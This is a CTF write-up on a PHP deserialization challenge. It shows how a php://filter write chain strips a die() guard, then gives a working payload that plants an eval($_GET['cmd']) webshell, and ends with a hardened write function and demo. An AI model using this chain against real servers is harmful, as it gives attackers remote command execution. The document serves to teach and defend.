Did another deserialization challenge and picked up a new trick along the way: [羊城杯 2020] easyser.

The challenge source:
```php
<?php
error_reporting(0);
// The source is only shown when the request appears to come from localhost.
if ($_SERVER['REMOTE_ADDR'] == "127.0.0.1") {
    highlight_file(__FILE__);
}
$flag = '{Trump_:"fake_news!"}';

class GWHT {
    public $hero;
    public function __construct() {
        $this->hero = new Yasuo;
    }
    // Runs when the object is used as a string; forwards to whatever $hero holds.
    public function __toString() {
        if (isset($this->hero)) {
            return $this->hero->hasaki();
        } else {
            return "You don't look very happy";
        }
    }
}

class Yongen { // flag.php
    public $file;
    public $text;
    public function __construct($file = '', $text = '') {
        $this->file = $file;
        $this->text = $text;
    }
    // Writes $text to $file with a die() guard prepended; $file is never validated,
    // so a stream wrapper can be supplied as the target.
    public function hasaki() {
        $d = '<?php die("nononon");?>';
        $a = $d . $this->text;
        @file_put_contents($this->file, $a);
    }
}

class Yasuo {
    public function hasaki() {
        return "I'm the best happy windy man";
    }
}
?>
```
The write target that makes this work:

`php://filter/write=string.strip_tags|convert.base64-decode/resource` (php://filter lets you chain several filters with `|`; they are applied left to right on every write).
Exploitation analysis. The chain fires when the unserialized `GWHT` object is converted to a string: `__toString()` calls `$hero->hasaki()`, and with `$hero` pointing at a `Yongen` object that is the unvalidated `file_put_contents()` write. Each write to the filter target goes through:

1. The shell is base64-encoded beforehand, so that `string.strip_tags` cannot damage it (the base64 alphabet contains no `<`/`>`).
2. `string.strip_tags` runs first and strips the `<?php die("nononon");?>` guard that `hasaki()` prepends (the classic `<?php exit; ?>` protection).
3. `convert.base64-decode` then restores the base64-encoded webshell, which is what actually lands in the file.
payload:

```php
<?php
// unserialize() never runs __construct(), so the property values below travel
// inside the serialized string; the server-side constructors do not matter.
class GWHT {
    public $hero;
    public function __toString() {
        if (isset($this->hero)) {
            return $this->hero->hasaki();
        } else {
            return "You don't look very happy";
        }
    }
}

class Yongen { // flag.php
    public $file;
    public $text;
    public function __construct() {
        // Write target is the filter chain: strip_tags removes the die() guard,
        // then base64-decode restores the encoded text before it hits shell.php.
        $this->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
        $this->text = base64_encode("<?php eval(\$_GET['cmd']);?>");
    }
    public function hasaki() {
        $d = '<?php die("nononon");?>';
        $a = $d . $this->text;
        @file_put_contents($this->file, $a);
    }
}

$a = new GWHT();
$b = new Yongen();
$a->hero = $b;                 // __toString() will now call Yongen::hasaki()
echo urlencode(serialize($a));
```
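The lesson on the defensive side is that a `die()` prefix is not a write guard at all once the target path is attacker-controlled, because any php://filter write chain can strip it. The following is an added example, not code from the write-up or the challenge, showing how `hasaki()` should have been written: refuse stream wrappers and directory components, pin the write to one allowed directory, and allowlist the extension. The function name `safe_write`, the temporary directory and the file names are constructed for this demo.

```php
<?php
// Added example: hardened replacement for Yongen::hasaki(). The die() prefix
// is kept only as defence in depth; the real controls are the path checks.

function safe_write(string $file, string $text, string $baseDir): string
{
    // 1. Reject any stream wrapper (php://, data://, phar://, ...) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $file) || strpos($file, "\0") !== false) {
        throw new InvalidArgumentException("stream wrappers are not allowed: $file");
    }
    // 2. Only a bare file name: no separators, no traversal components.
    if ($file === '' || $file === '.' || $file === '..' || basename($file) !== $file) {
        throw new InvalidArgumentException("not a plain file name: $file");
    }
    // 3. Allowlist the extension so nothing executable can be created.
    if (strtolower(pathinfo($file, PATHINFO_EXTENSION)) !== 'txt') {
        throw new InvalidArgumentException("only .txt files may be written: $file");
    }
    // 4. Resolve the one permitted directory and build the target inside it.
    $real = realpath($baseDir);
    if ($real === false || !is_dir($real)) {
        throw new RuntimeException("base directory does not exist: $baseDir");
    }
    $target = $real . DIRECTORY_SEPARATOR . $file;

    // 5. The guard from the original code stays, but we no longer rely on it.
    $guard = '<?php die("nononon");?>';
    if (file_put_contents($target, $guard . $text, LOCK_EX) === false) {
        throw new RuntimeException("write failed: $target");
    }
    return $target;
}

// Demo on a constructed temp directory: the chain from the write-up is refused,
// a plain .txt name is written and still starts with the guard.
$dir = sys_get_temp_dir() . '/easyser_demo_' . getmypid();
mkdir($dir, 0700);

$chain = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
foreach ([$chain, '../shell.php', 'shell.php'] as $bad) {
    try {
        safe_write($bad, 'x', $dir);
        echo "unexpected: accepted $bad\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: " . $e->getMessage() . "\n";
    }
}

$path = safe_write('notes.txt', 'hello', $dir);
$written = file_get_contents($path);
echo "wrote " . strlen($written) . " bytes to $path\n";
echo (strncmp($written, '<?php die("nononon");?>', 23) === 0) ? "guard intact\n" : "guard missing\n";

unlink($path);
rmdir($dir);
```

Run it with `php safe_write_demo.php`; the three rejections are the wrapper check, the traversal check and the extension allowlist respectively. Checking for `://` before anything else matters because `basename()` and `realpath()` do not understand wrappers and would happily pass a php://filter URL through.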